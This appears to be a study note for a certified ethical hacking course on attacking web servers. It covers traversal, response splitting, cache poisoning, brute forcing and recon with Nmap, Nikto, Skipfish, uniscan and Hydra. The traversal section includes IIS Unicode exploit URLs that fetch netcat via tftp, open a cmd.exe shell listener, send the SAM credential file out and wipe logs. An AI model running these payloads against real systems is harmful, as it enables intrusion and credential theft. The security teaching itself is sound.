CEH-Module13 - Hacking Web Servers

What is a Web Server?

A web server is a software application that serves content (such as web pages, images, videos, etc.) to clients (usually web browsers) over the internet or a local network. It uses the Hypertext Transfer Protocol (HTTP) to communicate with clients and fulfill their requests.

Web Server File Structure

The file structure of a web server typically refers to the organization of files and directories (folders) on the server that are accessible to clients over the internet or a network. This structure is important for organizing web content and ensuring that web servers can serve files correctly. Here is a basic explanation of the typical file structure of a web server:

  1. Root Directory: The root directory is the top-level directory of the web server’s file structure. In many web servers, this is represented by a directory like /var/www/html in Linux or C:\inetpub\wwwroot in Windows.

  2. Web Content: The web content directory contains the files that make up the website, including HTML files, CSS stylesheets, JavaScript files, images, videos, and other media. These files are typically organized into subdirectories based on their type or purpose (e.g., /css for stylesheets, /images for images).

  3. Server Configuration Files: Configuration files control how the web server behaves and are typically located in a separate directory from the web content. Common configuration files include httpd.conf for Apache HTTP Server, nginx.conf for Nginx, and web.config for Microsoft Internet Information Services (IIS).

  4. Server Logs: Server logs record information about client requests, server responses, errors, and other relevant details. These logs are often stored in a separate directory from the web content for easier management and security.

  5. Scripting and Programming Files: If the website uses server-side scripting or programming languages (e.g., PHP, Python, Ruby), the files for these scripts are typically stored in a separate directory. This directory may also contain libraries, modules, and other dependencies used by the scripts.

  6. Temporary Files: Temporary files generated by the web server or web applications may be stored in a separate directory to prevent them from cluttering up the web content directory.

  7. Configuration Directories: Some web servers use additional directories for specific configurations or settings. For example, Apache HTTP Server may use directories like /etc/apache2 for global configurations and /etc/apache2/sites-available for virtual host configurations.

  8. Security and Access Control Files: Files related to security settings, access control rules, and SSL/TLS certificates are often stored in specific directories to ensure they are properly managed and protected.

  9. Backup Files: Backup files created by the web server or administrators for disaster recovery purposes may be stored in a separate directory to prevent them from being accidentally accessed or modified.

  10. Custom Directories: Depending on the specific requirements of the website or web application, custom directories may be created to store specific types of files or data.

Overall, the file structure of a web server is designed to organize files and directories in a way that makes it easy to manage, maintain, and serve web content to clients.
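
For instance, a typical Linux/Apache-style layout might look like the sketch below (paths are illustrative and vary by distribution and server software):

    /var/www/html/            # document root: the web content served to clients
        index.html
        css/                  # stylesheets
        images/               # media files
        uploads/              # user-uploaded or temporary files
    /etc/apache2/             # server configuration files
        apache2.conf
        sites-available/      # virtual host configurations
    /var/log/apache2/         # access and error logs
        access.log
        error.log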

Why are Web Servers Attacked?

Web servers can be compromised for various reasons, including:

  • Outdated software: Running outdated versions of web server software, plugins, or modules that have known vulnerabilities.
  • Weak passwords: Using weak or default passwords for administrator accounts, FTP accounts, or database accounts.
  • Misconfigured servers: Incorrectly configured servers, such as allowing directory listing or not restricting access to sensitive files.
  • SQL injection: Allowing malicious SQL code to be injected into databases, often through user input.
  • Cross-site scripting (XSS): Allowing malicious code to be executed on a user’s browser, often through user input.
  • File inclusion vulnerabilities: Allowing an attacker to include malicious files or code on the server.
  • Unpatched vulnerabilities: Not applying security patches or updates to software, leaving known vulnerabilities open to exploitation.
  • Insufficient access controls: Not restricting access to sensitive areas of the server or application.
  • Malware and viruses: Allowing malware or viruses to infect the server, often through email or file uploads.
  • Poorly secured file uploads: Allowing users to upload malicious files, such as PHP backdoors or malware.
  • Lack of monitoring and logging: Not monitoring server logs or security events, making it difficult to detect and respond to security incidents.
  • Human error: Mistakes made by administrators, such as accidentally exposing sensitive information or configuring the server incorrectly.

To mitigate these risks, it’s important to keep web server software and other software up to date, use strong passwords, employ proper security configurations, and regularly monitor and audit server activity for signs of compromise.

Directory Traversal Attacks

A directory traversal attack, also known as path traversal, is a security exploit that targets web applications. It allows attackers to access files and directories on the server that they shouldn’t have permission to see. This can lead to sensitive information being exposed, such as:

  • Application source code: This can reveal vulnerabilities in the application and help attackers develop further exploits.
  • Configuration files: These files can contain usernames, passwords, and other sensitive information that can be used to gain further access to the system.
  • Operating system files: Accessing these files can give attackers complete control over the server.

Here’s how it works:

  1. Unsanitized user input: Web applications often take input from users, such as filenames or paths. If this input is not properly sanitized, attackers can inject special characters like “../” (dot-dot-slash), which tells the server to navigate one directory level up.
  2. Exploiting the vulnerability: By carefully crafting the input, attackers can navigate beyond the intended directory and access restricted areas of the server.
  3. Gaining unauthorized access: Once inside, attackers can steal data, install malware, or even take complete control of the server.

Impacts of Directory Traversal Attacks:

  • Data Theft: Attackers can steal sensitive information like user passwords, credit card details, or confidential documents.
  • Code Execution: In some cases, they might exploit further vulnerabilities to execute malicious code on the server, potentially leading to complete system compromise.
  • Website Defacement: Attackers can modify website content, displaying misleading information or promoting their own agenda.

Website visitors should be able to access the wwwRoot folder and navigate down into its subfolders, but never move up out of it into the rest of the server's file system.

Examples:

HTTP://Victim-Website/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
HTTP://Victim-Website/scripts/..%c0%af../winnt/system32/cmd.exe?/c+del+c:\dontdeleteme.txt
HTTP://Victim-Website/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
HTTP://Victim-Website/scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp+-i+192.168.0.100+GET+nc.exe
HTTP://Victim-Website/scripts/..%c0%af../winnt/system32/cmd.exe?/c+nc+-L+-p+79+-d+-e+cmd.exe
HTTP://Victim-Website/scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp+-i+192.168.0.100+GET+cleaniislog.exe
HTTP://Victim-Website/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\winnt\system32\logfiles\w3svc1
HTTP://Victim-Website/scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp+-i+192.168.0.100+put+c:\winnt\repair\sam
HTTP://Victim-Website/scripts/..%c0%af../winnt/system32/cmd.exe?/c+cleaniislog+c:\winnt\system32\logfiles\w3svc1\*******.log+192.168.20.1

`%c0%af` is an overlong Unicode (UTF-8) encoding of `/`; using it lets `../` sequences slip past filters that only check for the literal characters.
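
For a simpler, hedged illustration against a Linux target, an attacker might probe a file-download parameter with plain and URL-encoded ../ sequences (the download.php?file= parameter is hypothetical, not taken from the examples above):

    # classic probe for a world-readable file outside the web root
    curl "http://Victim-Website/download.php?file=../../../../etc/passwd"

    # the same traversal with ../ percent-encoded as %2e%2e%2f to evade naive filters
    curl "http://Victim-Website/download.php?file=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd"

If either response returns the contents of /etc/passwd, the application is not sanitizing the path input.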

Website Defacement

Website defacement is a type of cyberattack where an attacker gains unauthorized access to a website and alters its content, often replacing it with their own message or image. It’s akin to digital graffiti, aiming to disrupt the website’s intended use and potentially damage its reputation.

Here’s a breakdown of website defacement:

What happens:

  • Attackers exploit vulnerabilities in the website’s security, such as weak passwords, outdated software, or unpatched security holes.
  • Once inside, they modify website files, typically HTML pages, to display their own content.
  • This content can vary depending on the attacker’s motives. It might be:
    • A political or social message
    • Offensive or obscene content
    • A “hacked by” message claiming credit
    • Redirects to malicious websites

Impacts of website defacement:

  • Loss of trust and reputation: A defaced website can damage its owner’s credibility and brand image. Users may perceive the site as unsafe or unprofessional.
  • Financial losses: Defacement can disrupt business operations, leading to lost sales and revenue. It can also incur costs for cleanup and security repairs.
  • SEO damage: Search engines may penalize defaced websites, affecting their visibility and organic search ranking.
  • Data breaches: In some cases, attackers may use defacement as a stepping stone to access sensitive data on the website.

Motives of attackers:

  • Vandalism: Some attackers simply want to cause disruption or express their displeasure with the website’s owner or content.
  • Hacktivism: Groups with political or social agendas may deface websites to raise awareness about their cause.
  • Self-promotion: Some attackers deface websites to gain notoriety or promote themselves or their group.
  • Financial gain: In rare cases, attackers may use defacement to redirect users to malicious websites or install malware to steal financial information.

By understanding the risks and taking proactive steps, website owners can significantly reduce the chances of falling victim to website defacement and protect their online presence.

Web Server Misconfiguration

Web server misconfiguration refers to errors or oversights in the configuration of a web server that can lead to security vulnerabilities or operational issues. Misconfigurations can occur in various parts of the server setup, including the web server software, operating system, network settings, and security configurations. Some common examples of web server misconfigurations include:

  1. Directory Listing: If directory listing is enabled and there is no default index file (e.g., index.html), the server may list all files in a directory, potentially exposing sensitive information.

  2. File and Directory Permissions: Incorrect permissions on files and directories can allow unauthorized access or modification.

  3. Default Credentials: Using default or weak credentials for server administration interfaces can lead to unauthorized access.

  4. SSL/TLS Configuration: Incorrectly configured SSL/TLS settings can lead to weak encryption, exposing sensitive data to interception.

  5. Cross-Origin Resource Sharing (CORS): Improper CORS configuration can allow unauthorized websites to access sensitive resources.

  6. Server Side Includes (SSI): Improperly configured SSI directives can lead to code execution vulnerabilities.

  7. PHP Configuration: Incorrect PHP settings can lead to security vulnerabilities, such as allowing the execution of arbitrary code.

  8. Open Ports: Unnecessary ports left open can increase the attack surface of the server.

  9. Error Handling: Improper error handling can reveal sensitive information about the server or application.

  10. Backup Configuration: Insecure backup configurations can lead to data loss or unauthorized access to backups.
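
Several of these items come down to a few configuration directives. As one hedged hardening sketch (an Apache server with a Debian-style layout is assumed; directive placement varies by setup):

    # illustrative snippet for /etc/apache2/apache2.conf or a virtual host file
    <Directory /var/www/html>
        Options -Indexes          # disable directory listing (item 1)
        AllowOverride None
        Require all granted
    </Directory>

    ServerTokens Prod             # report only "Apache" in the Server header
    ServerSignature Off           # no version details on server-generated error pages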

By proactively managing and securing web server configurations, administrators can reduce the likelihood of security breaches and ensure the smooth operation of their web servers.

HTTP Response-Splitting Attack

An HTTP response splitting attack is a type of web security vulnerability that exploits weaknesses in how web servers handle user-supplied data within HTTP response headers. It allows attackers to inject malicious code into these headers, potentially taking control of user browsers, stealing sensitive information, or defacing websites.

Here’s how it works:

  1. Attacker Input: The attacker crafts malicious input containing special characters like carriage returns (CR) and line feeds (LF) into a user field that the web application processes.
  2. Vulnerable Server: The web server fails to properly sanitize the user input, allowing the CR/LF characters to be included in the HTTP response headers.
  3. Header Splitting: The CR/LF sequence terminates the current header line, so whatever the attacker appends is treated as additional, attacker-controlled headers; a doubled CR/LF can even end the headers entirely and start a second, attacker-supplied response.
  4. Exploitation: The attacker uses the injected header to perform various malicious actions, such as:
    • Cross-site scripting (XSS): Injects malicious scripts into the response, compromising user sessions or stealing data.
    • Cookie injection: Creates a new cookie with unauthorized privileges or steals existing cookies.
    • Host header injection: Redirects users to a malicious website.
    • Content injection: Modifies the website content displayed to the user.
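
As a hedged illustration, suppose a redirect endpoint reflects a user-supplied value into the Location header (the redirect?page= parameter below is hypothetical). CR and LF are URL-encoded as %0d%0a, so a request such as:

    http://Victim-Website/redirect?page=home%0d%0aSet-Cookie:%20session=attacker

would, on a server that does not strip CR/LF, produce a response containing an extra, attacker-controlled header:

    HTTP/1.1 302 Found
    Location: home
    Set-Cookie: session=attacker

A doubled %0d%0a ends the headers entirely, letting the attacker append a complete second response body of their choosing.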

Impact of HTTP Response Splitting:

This attack can have severe consequences, including:

  • Data breaches: Attackers can steal sensitive user information like passwords, credit card details, or personal data.
  • Website defacement: Attackers can modify website content to display misleading information or promote their own agenda.
  • Malware distribution: Attackers can inject malicious scripts that spread malware to users’ devices.
  • Loss of trust and reputation: Websites experiencing these attacks can suffer significant damage to their reputation and brand image.

Web Cache Poisoning Attack

Web cache poisoning is a technique used by attackers to manipulate the cache of a web application or a proxy server in order to serve malicious content to users. This can lead to a variety of security issues, such as spreading malware, conducting phishing attacks, or even taking complete control of a website.

Here’s how a web cache poisoning attack is typically carried out:

  1. Identifying a Vulnerable Cache: Attackers first identify a web application or proxy server that uses caching and is vulnerable to cache poisoning.

  2. Crafting a Poisoned Request: The attacker crafts a request to the target server that contains malicious content, such as a specially crafted HTTP header or parameter. This request is designed to be stored in the cache.

  3. Injecting the Poisoned Request: The attacker sends the poisoned request to the target server. If the server accepts the request and stores it in the cache, the malicious content becomes part of the cached data.

  4. Serving the Poisoned Content: When a legitimate user requests the same content from the cache, the server serves the poisoned content instead. This could be a phishing page, malware download, or other malicious content.

  5. Exploiting the Poisoned Content: Depending on the nature of the attack, the attacker can exploit the poisoned content to steal sensitive information, spread malware, or carry out other malicious activities.
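
A commonly cited hedged example abuses an unkeyed header such as X-Forwarded-Host; whether the header is reflected, and whether the response is cached, depends entirely on the target configuration (the cb parameter below is just a throwaway cache-buster for testing):

    # send a request whose reflected header points at an attacker-controlled host
    curl -s -H "X-Forwarded-Host: evil.example.com" "http://Victim-Website/?cb=poison1"

    # re-request the same URL without the header; if the first response was
    # cached, the poisoned copy is now served to ordinary visitors
    curl -s "http://Victim-Website/?cb=poison1"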

To defend against web cache poisoning attacks, it’s important to regularly update and patch caching servers, use secure coding practices to prevent injection attacks, and monitor for unusual or malicious activity in the cache.

SSH Brute Force Attack

An SSH (Secure Shell) brute force attack is a type of cyber attack in which an attacker attempts to gain unauthorized access to a remote server by systematically trying different username and password combinations. SSH is a protocol used for secure remote access to servers and is commonly used by administrators to manage servers remotely.

Here’s how an SSH brute force attack typically works:

  1. Enumeration: The attacker scans the internet for servers that have SSH enabled and are accessible over the internet.

  2. Brute Force: The attacker uses automated tools (such as Hydra, Medusa, or Ncrack) to try a large number of username and password combinations in rapid succession.

  3. Authentication Attempts: For each attempt, the attacker sends a login request to the server, trying different combinations until a successful login is achieved or until all combinations have been exhausted.

  4. Access: If the attacker successfully guesses a valid username and password combination, they gain unauthorized access to the server and can potentially carry out malicious activities, such as installing malware, stealing data, or disrupting services.
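
A minimal hedged sketch of such an attack with Hydra (the wordlist names and target address are placeholders):

    # try every user/password combination from the two lists over SSH,
    # using 4 parallel tasks and stopping at the first valid login (-f)
    hydra -L users.txt -P passwords.txt -t 4 -f ssh://<target_ip>

Common defenses include key-based authentication instead of passwords, banning repeated failed logins (for example with Fail2ban), and restricting which addresses can reach the SSH port.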

Web Server Password Cracking

Web server password cracking is a form of cyber attack where an attacker attempts to gain unauthorized access to a web server by systematically guessing the server’s password. This type of attack is typically carried out using automated tools that can try thousands or even millions of password combinations in a short amount of time.

Brutus is a tool that brute-forces web server passwords using supplied lists of usernames and passwords.

Here’s how web server password cracking works:

  1. Enumeration: The attacker first identifies the target web server and gathers information about it, such as the server’s IP address, the software it is running, and any usernames that may be valid.

  2. Password Guessing: The attacker then uses automated tools, such as brute force or dictionary attacks, to guess the server’s password. Brute force attacks try every possible combination of characters, while dictionary attacks use a list of common passwords.

  3. Authentication Attempts: For each password guess, the attacker sends a login request to the server, trying to authenticate as a valid user.

  4. Access: If the attacker successfully guesses the server’s password, they gain unauthorized access to the server and can potentially carry out malicious activities, such as stealing data, installing malware, or disrupting services.
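
As a hedged sketch, the same guessing process can be automated with Hydra against an area protected by HTTP Basic Authentication (the /admin path and wordlist names are placeholders):

    # brute-force HTTP Basic Authentication on a protected directory
    hydra -L users.txt -P passwords.txt <target_ip> http-get /admin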

To protect against web server password cracking attacks, server administrators can take several measures:

  1. Use Strong Passwords: Use long, complex, and unique passwords for server accounts to make it harder for attackers to guess them.

  2. Implement Multi-Factor Authentication (MFA): Use MFA to add an extra layer of security, requiring users to provide additional verification, such as a code sent to their phone, in addition to their password.

  3. Limit Login Attempts: Implement mechanisms to limit the number of failed login attempts from a single IP address, which can help prevent brute force attacks.

  4. Monitor Logs: Regularly monitor server logs for unusual login patterns or failed login attempts.

  5. Update Software: Keep server software and other software up to date to protect against known vulnerabilities.

By implementing these measures, server administrators can significantly reduce the risk of web server password cracking attacks and protect their servers from unauthorized access.

Web Server Attack Methodology

The typical methodology consists of Information Gathering, Web Server Footprinting, Website Mirroring, Vulnerability Scanning, Session Hijacking, and Web Server Password Cracking.

Robots.txt File

The robots.txt file is a text file placed in the root directory of a website to instruct web robots (also known as crawlers, spiders, or bots) how to crawl and index its pages. Web robots are automated programs used by search engines to discover and index content on the internet.

The robots.txt file contains directives that specify which parts of the website should not be crawled or indexed by search engines. It can also include directives that specify the location of the website’s XML sitemap, which provides a list of URLs that the website owner wants the search engine to index.

The robots.txt file follows a specific syntax and can include the following directives:

  • User-agent: Specifies the robot to which the following directives apply. For example, User-agent: * applies to all robots, while User-agent: Googlebot applies only to Google’s crawler.
  • Disallow: Specifies URLs that should not be crawled. For example, Disallow: /private/ tells robots not to crawl any URLs in the /private/ directory.
  • Allow: Specifies URLs that can be crawled even if they are in a disallowed directory. For example, Allow: /public/ allows robots to crawl URLs in the /public/ directory.
  • Sitemap: Specifies the location of the XML sitemap. For example, Sitemap: https://www.example.com/sitemap.xml tells robots where to find the sitemap.
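
A minimal example file combining these directives (the paths and sitemap URL are illustrative):

    User-agent: *
    Disallow: /private/
    Disallow: /admin/
    Allow: /public/
    Sitemap: https://www.example.com/sitemap.xml

From an attacker's perspective, the Disallow entries themselves can reveal interesting paths, which is why several tools later in this module fetch robots.txt during reconnaissance.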

It’s important to note that the robots.txt file is a voluntary mechanism for controlling how search engines crawl and index a website. While most reputable search engines honor the directives in the robots.txt file, malicious bots or those from less reputable sources may not. Therefore, the robots.txt file should not be used as a security measure to protect sensitive content.

Enumerate Web Server Information Using Nmap

To enumerate web server information using Nmap, you can use various parameters and scripts. Here are some common parameters and scripts you can use:

  1. Parameter -sV: This parameter enables version detection, which allows Nmap to determine the version of the web server running on the target host. Use it like this:

    nmap -sV <target_ip>
    
  2. Parameter -p: Use this parameter to specify the port or range of ports to scan. For example, to scan ports 80 (HTTP) and 443 (HTTPS), you would use:

    nmap -sV -p 80,443 <target_ip>
    
  3. Nmap Scripting Engine (NSE): Nmap provides a scripting engine that allows you to use pre-written scripts to automate tasks. There are several scripts available for enumerating web server information. For example:

    • http-enum.nse: This script enumerates directories, files, and other information from web servers.

      nmap --script=http-enum <target_ip>
      
    • http-headers.nse: This script retrieves HTTP headers from web servers.

      nmap --script=http-headers <target_ip>
      
    • http-title.nse: This script retrieves the title of web pages served by web servers.

      nmap --script=http-title <target_ip>
      
    • http-methods.nse: This script enumerates HTTP methods supported by web servers.

      nmap --script=http-methods <target_ip>
      
    • http-server-header.nse: This script retrieves the server header from HTTP responses.

      nmap --script=http-server-header <target_ip>
      
    • http-robots.txt.nse: This script retrieves the contents of the robots.txt file, if present, from web servers.

      nmap --script=http-robots.txt <target_ip>
      

    These scripts can provide valuable information about the web server configuration, which can be useful for further enumeration and assessment.

Along with these, Nmap ships many other http-* NSE scripts, such as http-frontpage-login.
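
Several of these checks can also be combined into one hedged sweep (script availability depends on the installed Nmap version):

    # version detection plus a handful of HTTP enumeration scripts in a single run
    nmap -sV -p 80,443 --script "http-enum,http-headers,http-title,http-methods,http-robots.txt" <target_ip>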

Finding Default Content on a Web Server

DirBuster - DirBuster is a tool used for brute-force discovery of directories and files on web servers. It helps in finding hidden content by trying various combinations of common directory and file names.

Dirhunt is a web crawler that helps identify and analyze web directories, files, and folders. It’s often used by security professionals and penetration testers to:

  • Discover hidden or non-linked directories and files
  • Identify potential vulnerabilities and weaknesses
  • Map out the structure of a web application
  • Find sensitive information that may be exposed

Dirhunt can be used to crawl a website and identify directories and files that may not be intended for public access, such as backup files, configuration files, or sensitive data.

Nikto2 is a web server scanner that scans for vulnerabilities and gathers information about a web server. Here are some key features:

  • Checks for over 6,700 potentially dangerous files and programs
  • Identifies installed plugins and software
  • Detects outdated versions of software
  • Checks for misconfigured files and directories
  • Performs a variety of other web server checks

Nikto2 is often used by security professionals and penetration testers to identify potential security issues in web servers.
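
Hedged example invocations for both tools (exact options vary by version, and the target URL is a placeholder):

    # crawl a site and analyze its directory structure with Dirhunt
    dirhunt http://Victim-Website/

    # scan a web server with Nikto2 and save the findings to an HTML report
    nikto -h http://Victim-Website/ -o nikto-report.html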

Detecting Web Server Hacking Attempts

Directory Monitor is a software tool that monitors file system changes in real-time. It can track changes to files, directories, and network shares, and can alert users or take actions when changes occur.
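
On Linux, a comparable hedged approach is to watch the web root with inotifywait from the inotify-tools package (the path is illustrative):

    # print every modification, creation, or deletion under the web root in real time
    inotifywait -m -r -e modify,create,delete /var/www/html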

Gather Website Information Using Ghost Eye and Skipfish

Ghost Eye is an information-gathering tool written in Python 3. To run, Ghost Eye only needs a domain or IP. Ghost Eye can work with any Linux distros if they support Python 3.

Ghost Eye gathers information such as Whois lookup, DNS lookup, EtherApe, Nmap port scan, HTTP header grabber, Clickjacking test, Robots.txt scanner, Link grabber, IP location finder, and traceroute.

Run the Ghost Eye tool on Parrot OS (or another Linux distribution). It first prompts you to enter a website name or IP address, then presents a menu of options such as DNS lookup, Whois lookup, Nmap port scan, clickjacking test, and more.

Skipfish is an active web application (deployed on a webserver) security reconnaissance tool. It prepares an interactive sitemap for the targeted site by carrying out a recursive crawl and dictionary-based probes. The resulting map is then annotated with the output from a number of active (but hopefully non-disruptive) security checks. The final report generated by the tool is meant to serve as a foundation for professional web application security assessments.

On the Windows machine, install WampServer to host a test website. On the Parrot OS machine, install Skipfish and run the command skipfish -o /home/attacker/test -S /usr/share/skipfish/dictionaries/complete.wl http://[IP Address of Windows Server 2022]:8080. On receiving this command, Skipfish performs a heavy brute-force scan against the web server using the complete.wl dictionary file, creates a directory named test at the specified output location, and stores the results in index.html inside it.

The report lists the vulnerabilities found on the web server. Go through the list and patch the server accordingly.

Gather Website Information Using the httprecon Tool

Install the httprecon GUI tool on Windows and run it. Enter the website URL and wait a few minutes for the scan to complete; the output displays details about the target web server.

Gather Web Server Information Using Netcat and Telnet

Netcat:

In a terminal window, type nc -vv www.google.com 80 and press Enter.

You won't see any output at first. Type GET / HTTP/1.0 and press Enter twice. Netcat performs banner grabbing and gathers information such as content type, last modified date, accept ranges, ETag, and server information.

Telnet:

Type telnet www.google.com 80 and press Enter.

Once the connection is established, type GET / HTTP/1.0 and press Enter twice. Telnet performs the same banner grabbing and returns information such as content type, last modified date, accept ranges, ETag, and server information.

Gather Website Information using Nmap

  • nmap -sV --script=http-enum www.google.com - This script enumerates common directories, files, and applications on the target web server and displays the details it finds.
  • nmap --script hostmap-bfk --script-args hostmap-bfk.prefix=hostmap- www.goodshopping.com - This script discovers other hostnames that resolve to the targeted domain's address.
  • Perform an HTTP trace on the targeted domain. In the terminal window, type nmap --script http-trace -d www.goodshopping.com and press Enter.
  • Check whether Web Application Firewall is configured on the target host or domain. In the terminal window, type nmap -p80 --script http-waf-detect www.goodshopping.com and press Enter.

Gather Website Information using uniscan software in Parrot OS

Uniscan is a web vulnerability scanner tool that not only performs simple commands like ping, traceroute, and nslookup, but also does static, dynamic, and stress checks on a web server. Apart from scanning websites, uniscan also performs automated Bing and Google searches on provided IPs. Uniscan takes all of this data and combines them into a comprehensive report file for the user.

In the terminal window, type uniscan -u http://< webserverip >:8080/CEH -q and hit Enter to start scanning for directories. In the above command, the -u switch is used to provide the target URL, and the -q switch is used to scan the directories in the web server.

Type uniscan -u http://< webserverip >:8080/CEH -we and hit Enter. Here, the -w and -e switches are used together to enable the file checks (robots.txt and sitemap.xml).

Use the -d parameter to start a dynamic scan: Type uniscan -u http://< webserverip >:8080/CEH -d and hit Enter

Crack FTP Credentials using THC Hydra

A dictionary or wordlist contains thousands of words that password cracking tools use to break into password-protected systems. An attacker may either crack a password manually by guessing it or use automated tools and techniques such as the dictionary method. Most password cracking attempts succeed because of weak or easily guessable passwords.

Create wordlist files containing username and password combinations for ftp login.
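
For a quick lab run, small wordlists can be created by hand; the entries below are only an example, and real attacks use far larger lists:

    # write a few candidate usernames and passwords to the wordlist files
    printf "admin\nftpuser\nroot\n" > /home/user01/Desktop/Wordlists/Usernames.txt
    printf "password123\nletmein\nP@ssw0rd\n" > /home/user01/Desktop/Wordlists/Passwords.txt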

In the terminal window, type hydra -L /home/user01/Desktop/Wordlists/Usernames.txt -P /home/user01/Desktop/Wordlists/Passwords.txt ftp://[IP Address of FTP Server] and press Enter.
